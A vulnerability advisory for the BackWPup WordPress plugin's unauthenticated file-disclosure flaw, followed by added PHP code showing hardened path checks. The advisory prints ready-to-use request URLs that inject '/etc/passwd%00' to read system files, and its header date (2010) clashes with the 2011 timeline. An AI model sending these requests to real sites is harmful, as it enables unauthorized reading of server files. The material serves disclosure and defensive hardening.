=============================================
- Release date: Feb 28th, 2010
- Discovered by: Danilo Massa
- Severity: High
=============================================

I. VULNERABILITY
-------------------------
BackWPup WordPress plugin <= 1.4.0 file content disclosure

II. BACKGROUND
-------------------------
BackWPup 1.4.0 is a full-featured backup management solution for WordPress. The plugin provides:
- Database Backup
- WordPress XML Export
- Optimize Database
- Check\Repair Database
- File Backup
- Backups in zip, tar, tar.gz, tar.bz2 format
- Store backup to Folder
- Store backup to FTP Server
- Store backup to Amazon S3
- Store backup to RackSpaceCloud
- Store backup to DropBox
- Send Log/Backup by eMail

III. INTRODUCTION
-------------------------
BackWPup version 1.4.0 (and possibly earlier versions too) has an unfiltered parameter in two PHP pages that lets a remote user access sensitive files such as /etc/passwd. No authentication is required. No plugin activation is required.

IV. DESCRIPTION
-------------------------
Input passed via the "wpabs" parameter to the PHP pages
- wp-content/plugins/backwpup/app/options-view_log-iframe.php
- wp-content/plugins/backwpup/app/options-runnow-iframe.php
is not sanitized before being used. Both files start by trying to include the wp-load.php file using the wpabs parameter, which can be injected with a direct call to the page.

options-runnow-iframe.php:
/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1

options-view_log-iframe.php:
http:///wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd

Both of them will display the /etc/passwd file.

VI. BUSINESS IMPACT
-------------------------
An attacker could exploit the vulnerability to retrieve virtually any text file accessible by the web application server user.

VII. SYSTEMS AFFECTED
-------------------------
Version 1.4.0 is vulnerable. Versions < 1.4.0 could be vulnerable.

VIII. SOLUTION
-------------------------
Upgrade to a patched release or, as a quick workaround, enclose any $_GET['wpabs'] in a trim() call like this:

    if (file_exists(trim($_GET['wpabs']).'wp-load.php') and file_exists($_GET['logfile'])) {

IX. REFERENCES
-------------------------
http://wordpress.org/extend/plugins/backwpup/
http://danielhuesken.de/portfolio/backwpup/

X. CREDITS
-------------------------
The vulnerability has been discovered by Danilo Massa
danilo(under_score)m(at)yahoo(dot)com

XI. VULNERABILITY HISTORY
-------------------------
January 28th, 2011: Vulnerability identification
January 30th, 2011: Vendor notification
January 30th, 2011: Vendor releases an updated version (1.4.1)
February 28th, 2011: Vulnerability disclosure

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
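The trim() workaround in section VIII works because PHP's trim() strips "\0" by default, so the %00 truncation trick on the wpabs parameter no longer cuts off the appended 'wp-load.php' suffix. It still lets the caller pick an arbitrary directory, and it does nothing for the logfile parameter. The following is an added example, not BackWPup's code, showing a reconstruction of the vulnerable shape (assumed from the advisory's description; the real plugin source is not on the page) next to a hardened form that rejects control bytes, resolves paths with realpath(), and confines both parameters to locations the plugin legitimately needs. The function names and the $pluginDir / $logDir arguments are assumptions for illustration.

```php
<?php
// Added example (not the plugin's own code).

// Vulnerable shape, reconstructed from the advisory: the request fully controls
// the directory and, on PHP builds that honour NUL truncation, a trailing %00
// discards the appended suffix so an arbitrary file gets included/read.
function vulnerable_wp_load_path(array $get): string {
    return $get['wpabs'] . 'wp-load.php';
}

// Hardened form for the wp-load.php lookup.
// $pluginDir is the directory this script lives in (normally __DIR__).
function safe_wp_load_path(string $wpabs, string $pluginDir): ?string {
    // 1. Reject NUL and any other control byte outright; trim() would only
    //    strip them from the ends, and a literal "\0" inside a path is never
    //    legitimate.
    if (preg_match('/[\x00-\x1f\x7f]/', $wpabs)) {
        return null;
    }
    // 2. Canonicalise: realpath() collapses ../ and symlinks and returns
    //    false for a path that does not exist.
    $dir    = realpath($wpabs);
    $plugin = realpath($pluginDir);
    if ($dir === false || $plugin === false || !is_dir($dir)) {
        return null;
    }
    // 3. The WordPress root must be an ancestor of the plugin directory
    //    (wp-content/plugins/backwpup/app/ lives underneath it). /etc or any
    //    directory outside the install tree fails this prefix check.
    $prefix = rtrim($dir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strpos($plugin . DIRECTORY_SEPARATOR, $prefix) !== 0) {
        return null;
    }
    $candidate = $prefix . 'wp-load.php';
    return is_file($candidate) ? $candidate : null;
}

// Hardened form for the logfile parameter: keep only a file name, whitelist
// its characters, and require the resolved path to sit inside $logDir.
function safe_log_path(string $logfile, string $logDir): ?string {
    if (preg_match('/[\x00-\x1f\x7f]/', $logfile)) {
        return null;
    }
    $name = basename($logfile);                 // drop any directory component
    if (!preg_match('/^[A-Za-z0-9_.-]+\.log$/', $name)) {
        return null;                            // ".." and odd names fail here
    }
    $base = realpath($logDir);
    $path = realpath($logDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    $basePrefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strpos($path, $basePrefix) === 0 ? $path : null;
}

// Constructed request mirroring the advisory's example; both checks refuse it.
$get = ['wpabs' => "/etc/passwd\0", 'logfile' => '/etc/passwd'];
var_dump(safe_wp_load_path($get['wpabs'], __DIR__));   // NULL (NUL byte)
var_dump(safe_log_path($get['logfile'], __DIR__ . '/logs')); // NULL (no .log name)

// The most robust fix removes the parameter altogether: an iframe page that
// already lives under wp-content/plugins/<name>/app/ can locate wp-load.php
// from its own position, so nothing in the request needs to be trusted.
$wpLoad = dirname(__DIR__, 4) . '/wp-load.php';   // assumed layout
```

The prefix checks use the canonical path plus a trailing separator so that a sibling directory with a shared prefix (for example /var/www/wp2 when the install is /var/www/wp) cannot pass, and the NUL rejection happens before realpath() is called because realpath() itself raises a ValueError on paths containing NUL in PHP 8.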